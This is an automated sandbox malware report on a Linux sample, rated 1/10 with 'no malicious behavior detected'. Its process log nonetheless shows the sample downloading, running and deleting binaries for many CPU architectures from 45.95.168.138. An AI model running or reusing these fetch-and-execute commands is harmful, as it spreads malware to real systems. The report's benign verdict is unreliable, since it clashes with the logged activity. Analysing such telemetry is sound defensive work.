Malware Analysis Report

2025-08-11 05:14

Sample ID 240505-cxymhaca51
Target 15917961bac6063481040fcc4af85061_JaffaCakes118
SHA256 f7e374f479296d08a98d549c93433ec13ddeaf6835ea9d76d0bf33c23ff24682
Tags
Score 1/10

Analysis Overview

Score 1/10

SHA256

f7e374f479296d08a98d549c93433ec13ddeaf6835ea9d76d0bf33c23ff24682

Threat Level: No (potentially) malicious behavior was detected

The file 15917961bac6063481040fcc4af85061_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.

Malicious Activity Summary

N/A

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-05-05 02:27

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-05 02:27

Reported

2024-05-05 03:02

Platform

debian9-mipsbe-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-05 02:27

Reported

2024-05-05 03:03

Platform

debian9-mipsel-20240226-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-05 02:27

Reported

2024-05-05 03:05

Platform

ubuntu1804-amd64-20240418-en

Max time kernel

36s

Max time network

129s

Command Line

[/tmp/15917961bac6063481040fcc4af85061_JaffaCakes118]

Signatures

N/A

Processes

Process                                                Command line
/tmp/15917961bac6063481040fcc4af85061_JaffaCakes118    [/tmp/15917961bac6063481040fcc4af85061_JaffaCakes118]
/usr/bin/wget                                          [wget http://45.95.168.138/mips]
/bin/chmod                                             [chmod +x mips]
/tmp/mips                                              [./mips]
/bin/rm                                                [rm -rf mips]
/usr/bin/wget                                          [wget http://45.95.168.138/mipsel]
/bin/chmod                                             [chmod +x mipsel]
/tmp/mipsel                                            [./mipsel]
/bin/rm                                                [rm -rf mipsel]
/usr/bin/wget                                          [wget http://45.95.168.138/sh4]
/bin/chmod                                             [chmod +x sh4]
/tmp/sh4                                               [./sh4]
/bin/rm                                                [rm -rf sh4]
/usr/bin/wget                                          [wget http://45.95.168.138/x86]
/bin/chmod                                             [chmod +x x86]
/tmp/x86                                               [./x86]
/bin/rm                                                [rm -rf x86]
/usr/bin/wget                                          [wget http://45.95.168.138/armv6l]
/bin/chmod                                             [chmod +x armv6l]
/tmp/armv6l                                            [./armv6l]
/bin/rm                                                [rm -rf armv6l]
/usr/bin/wget                                          [wget http://45.95.168.138/i686]
/bin/chmod                                             [chmod +x i686]
/tmp/i686                                              [./i686]
/bin/rm                                                [rm -rf i686]
/usr/bin/wget                                          [wget http://45.95.168.138/powerpc]
/bin/chmod                                             [chmod +x powerpc]
/tmp/powerpc                                           [./powerpc]
/bin/rm                                                [rm -rf powerpc]
/usr/bin/wget                                          [wget http://45.95.168.138/i586]
/bin/chmod                                             [chmod +x i586]
/tmp/i586                                              [./i586]
/bin/rm                                                [rm -rf i586]
/usr/bin/wget                                          [wget http://45.95.168.138/m68k]
/bin/chmod                                             [chmod +x m68k]
/tmp/m68k                                              [./m68k]
/bin/rm                                                [rm -rf m68k]
/usr/bin/wget                                          [wget http://45.95.168.138/sparc]
/bin/chmod                                             [chmod +x sparc]
/tmp/sparc                                             [./sparc]
/bin/rm                                                [rm -rf sparc]
/usr/bin/wget                                          [wget http://45.95.168.138/armv4l]
/bin/chmod                                             [chmod +x armv4l]
/tmp/armv4l                                            [./armv4l]
/bin/rm                                                [rm -rf armv4l]
/usr/bin/wget                                          [wget http://45.95.168.138/armv5l]
/bin/chmod                                             [chmod +x armv5l]
/tmp/armv5l                                            [./armv5l]
/bin/rm                                                [rm -rf armv5l]

Network

Country  Destination          Domain  Proto
US       151.101.194.49:443   -       tcp
GB       185.125.188.61:443   -       tcp
GB       185.125.188.62:443   -       tcp
US       151.101.129.91:443   -       tcp
US       151.101.129.91:443   -       tcp
HR       45.95.168.138:80     -       tcp
N/A      224.0.0.251:5353     -       udp
GB       195.181.164.19:443   -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-05 02:27

Reported

2024-05-05 03:05

Platform

debian9-armhf-20240418-en

Max time network

38s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country  Destination          Domain  Proto
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp
HR       45.95.168.138:80     -       tcp

Files

N/A